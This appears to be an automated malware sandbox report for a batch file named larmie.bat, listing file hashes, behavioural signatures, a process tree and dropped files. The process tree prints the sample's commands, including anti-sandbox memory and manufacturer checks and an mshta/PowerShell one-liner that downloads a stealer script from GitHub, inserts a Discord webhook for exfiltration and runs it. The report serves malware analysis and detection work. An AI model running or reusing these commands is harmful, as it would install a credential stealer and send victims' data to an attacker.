Overview

overview

7

Static

static

1

larmieW/larmie.bat

windows7-x64

7

larmieW/larmie.bat

windows10-2004-x64

4

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24/06/2024, 18:30

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    larmieW/larmie.bat

  • Size

    3.6MB

  • MD5

    e7e8306a93ea523ab066468443ffb196

  • SHA1

    48652fcd35e92550ded4ff3fcc277884732d6439

  • SHA256

    8d07eda5b26559da0f42a744dc34993dfb177d4a6a5235b9d4c79af2c340b4f0

  • SHA512

    9d7f57623396eff5cc1a64c3d83de5c318d52d07bc108656ceeb6aa4ac9acbaf9259e1955191330af0856f8407b8f9a7f861132e678790cdd61b4bdb2e17ac4b

  • SSDEEP

    6144:jjbHqlcHX7XK9xaMBSDlV6iIGVVKuobZa:DBAM/6iFQA

Score
7/10
defense_evasion

Malware Config

Signatures

  • Drops startup file 2 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
        PID:2548
      • C:\Windows\system32\findstr.exe
        findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
        2⤵
          PID:2600
        • C:\Windows\system32\findstr.exe
          findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
          2⤵
            PID:2284
          • C:\Windows\system32\chcp.com
            chcp 65001
            2⤵
              PID:2524
            • C:\Windows\system32\findstr.exe
              findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
              2⤵
                PID:3036
              • C:\Windows\system32\findstr.exe
                findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                2⤵
                  PID:2400
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2436
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic computersystem get manufacturer /value
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2468
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1596
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic computersystem get manufacturer /value
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2392
                • C:\Windows\system32\findstr.exe
                  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                  2⤵
                    PID:2916
                  • C:\Windows\system32\rundll32.exe
                    rundll32
                    2⤵
                      PID:2996
                    • C:\Windows\system32\findstr.exe
                      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                      2⤵
                        PID:1436
                      • C:\Windows\system32\findstr.exe
                        findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                        2⤵
                          PID:2748
                        • C:\Windows\system32\findstr.exe
                          findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                          2⤵
                            PID:2760
                          • C:\Windows\system32\findstr.exe
                            findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                            2⤵
                              PID:872
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
                              2⤵
                              • Hide Artifacts: Ignore Process Interrupts
                              • Suspicious behavior: EnumeratesProcesses
                              PID:644
                            • C:\Windows\system32\findstr.exe
                              findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                              2⤵
                                PID:1660
                              • C:\Windows\system32\findstr.exe
                                findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                                2⤵
                                  PID:2632
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
                                  2⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1912
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic computersystem get manufacturer /value
                                    3⤵
                                      PID:1864
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
                                    2⤵
                                      PID:336
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic computersystem get manufacturer /value
                                        3⤵
                                          PID:544
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
                                        2⤵
                                        • Hide Artifacts: Ignore Process Interrupts
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1556
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
                                        2⤵
                                          PID:1752
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get manufacturer /value
                                            3⤵
                                              PID:1120
                                          • C:\Windows\system32\findstr.exe
                                            findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                                            2⤵
                                              PID:2364
                                            • C:\Windows\system32\findstr.exe
                                              findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
                                              2⤵
                                                PID:848
                                              • C:\Windows\system32\timeout.exe
                                                timeout 0
                                                2⤵
                                                • Delays execution with timeout.exe
                                                PID:356
                                              • C:\Windows\system32\doskey.exe
                                                doskey VERIFY=CALL
                                                2⤵
                                                  PID:1284
                                                • C:\Windows\system32\net.exe
                                                  net session
                                                  2⤵
                                                    PID:1004
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 session
                                                      3⤵
                                                        PID:2868
                                                    • C:\Windows\system32\timeout.exe
                                                      timeout 0
                                                      2⤵
                                                      • Delays execution with timeout.exe
                                                      PID:1324
                                                    • C:\Windows\system32\mshta.exe
                                                      mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1249045721093767279/Lz3dAGN07f4uZc0v6gC8iYaLcuN6mzx5_rGPuF3crLPHJRXtyfNcSAyrHREtUP1JtzH3' | iex",0))
                                                      2⤵
                                                      • Modifies Internet Explorer settings
                                                      PID:292
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1249045721093767279/Lz3dAGN07f4uZc0v6gC8iYaLcuN6mzx5_rGPuF3crLPHJRXtyfNcSAyrHREtUP1JtzH3' | iex
                                                        3⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1748

                                                  Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\Temp\larmieW\kdotDgKSKR.bat
                                                          Filesize

                                                          181B

                                                          MD5

                                                          692f7565ccaf213975a6b85b620a6d96

                                                          SHA1

                                                          20ea4815c0e06fdd1870348987a2687885d34f62

                                                          SHA256

                                                          2480fec57fb8d4d05a7052d55a43dc7e1644f8d92fc6696f9e7415fb8bded5d2

                                                          SHA512

                                                          5d5bf7e704d7ab0c15fd3c40a16ad753e9f4fa39b0f47f6efa9a2e4d824f1e8167b01f57032bd60669024ddb62381fb1fa88808ce93d07b639e52aac9ce57633

                                                          Download Submit

                                                        • C:\Users\Admin\AppData\Local\Temp\larmieW\kdotLWsvu.bat
                                                          Filesize

                                                          13B

                                                          MD5

                                                          337065424ed27284c55b80741f912713

                                                          SHA1

                                                          0e99e1b388ae66a51a8ffeee3448c3509a694db8

                                                          SHA256

                                                          4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b

                                                          SHA512

                                                          d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a

                                                          Download Submit

                                                        • C:\Users\Admin\AppData\Local\Temp\larmieW\kdotLWsvu.bat
                                                          Filesize

                                                          90B

                                                          MD5

                                                          a76646b40aec1c86b1a493fe1454fe4e

                                                          SHA1

                                                          13d2be4be82478770d637bcf79817fc3b7c99798

                                                          SHA256

                                                          f5007222ee53739427ac39f3e63fdbeeb0af962afd3343b2eaceb605e5dabe4d

                                                          SHA512

                                                          ae1b02a76800bb16fe4b0cc2f94050f8108d9fbecc673cf775212a9d55cf661332296facd31dd64af0297704658b337eb12b2fba4c2db93e9d7dbe0cc79458d5

                                                          Download Submit

                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                          Filesize

                                                          7KB

                                                          MD5

                                                          370df60cd6b7275a0c8bdab502e69140

                                                          SHA1

                                                          d8102dbf9e85a1416bc5a762a075b139fbd3915e

                                                          SHA256

                                                          a0752e3cd12fb313c27327031f5a7c8bab0896921893d759f46c5968210db5f8

                                                          SHA512

                                                          e97450dafc205a44b8ba1f22db76434769077dcf4e6ae2f63e95e0795f0d0f80e3422bb893c420c47b92182283006217432f1b2f352aed5b4beaf6c978e50f7f

                                                          Download Submit

                                                        • memory/644-114-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

                                                          Filesize

                                                          2.9MB

                                                          Download

                                                        • memory/644-115-0x0000000002970000-0x0000000002978000-memory.dmp

                                                          Filesize

                                                          32KB

                                                          Download

                                                        • memory/1556-143-0x000000001B730000-0x000000001BA12000-memory.dmp

                                                          Filesize

                                                          2.9MB

                                                          Download

                                                        • memory/1556-144-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                                                          Filesize

                                                          32KB

                                                          Download